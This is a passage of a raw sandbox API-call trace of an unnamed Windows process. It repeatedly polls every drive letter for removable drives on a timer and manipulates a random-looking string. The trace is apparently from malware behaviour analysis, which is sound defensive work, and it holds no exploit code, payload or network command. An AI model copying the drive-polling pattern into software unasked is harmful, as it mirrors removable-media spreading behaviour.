[0217.973] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.973] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.973] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.974] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.974] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.975] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.975] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.975] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.976] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.976] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.977] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.977] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.977] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.977] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.978] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.978] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.978] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.979] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.979] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0217.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.980] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0217.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0217.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0217.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0217.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0217.980] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0217.981] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.981] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0217.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.981] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.981] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.981] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0217.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.982] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.982] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.982] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.982] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.982] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.983] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.983] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.983] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.983] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.983] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.983] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.984] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.984] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.984] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.984] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.984] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.985] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.985] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.985] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.985] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.986] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.986] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.986] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.987] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.987] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.987] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.987] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.988] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.988] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.988] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0217.988] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.988] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.988] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.988] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.988] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.988] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.988] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.988] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.989] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0217.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0217.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fa0 [0217.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fa0 | out: hHeap=0x12c0000) returned 1 [0217.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0217.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.989] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0217.989] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0217.989] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0217.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.989] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0217.990] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.990] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.990] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.990] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.990] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.990] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.990] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0217.990] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0217.990] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.990] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0217.990] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.990] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0217.990] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0217.990] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.990] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0217.990] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.990] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.990] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0217.990] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.990] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.990] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.990] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.990] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0217.990] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.991] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.991] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.991] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.991] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.991] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.991] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.991] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.992] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.992] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.992] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.992] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.121] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.122] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.122] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.122] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.123] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.123] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.123] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.123] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.124] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.124] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.124] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.124] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.125] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.125] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.125] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.126] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.126] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0218.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.127] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.127] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.127] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.127] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.127] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.127] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.128] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.128] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0218.128] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.128] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0218.128] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0218.128] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.128] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0218.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0218.129] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0218.129] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0218.129] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0218.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.129] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.129] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0218.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.130] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0218.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.130] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.130] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.130] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0218.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0218.130] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0218.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0218.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 